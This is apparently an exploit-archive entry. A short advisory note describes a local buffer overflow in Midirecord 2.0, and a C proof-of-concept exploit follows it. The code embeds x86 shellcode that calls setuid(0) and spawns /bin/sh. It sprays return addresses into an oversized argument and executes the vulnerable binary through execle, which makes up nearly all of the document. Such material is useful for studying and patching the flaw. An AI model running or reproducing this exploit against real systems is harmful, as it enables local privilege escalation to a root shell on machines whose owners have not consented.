// source: https://www.securityfocus.com/bid/19190/info
Midirecord is prone to a local buffer-overflow vulnerability because it fails to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.
An attacker can exploit this issue to execute arbitrary code in the context of the victim running the affected application.
Version 2.0 is vulnerable to this issue; other versions may also be affected.
* Successful Exploit in Ubuntu Breezey */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define BUFSIZE 225
#define ALIGNMENT 1
int main(int argc, char **argv )
{
char shellcode[]=
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";
if(argc < 2)
{
fprintf(stderr, "Use : %s <path_to_vuln>\n", argv[0]);
return 0;
}
char *env[] = {shellcode, NULL};
char buf[BUFSIZE];
int i;
int *ap = (int *)(buf + ALIGNMENT);
int ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);
for (i = 0; i < BUFSIZE - 4; i += 4)
*ap++ = ret;
execle(argv[1], "/dev/midi1", buf, NULL, env);
}
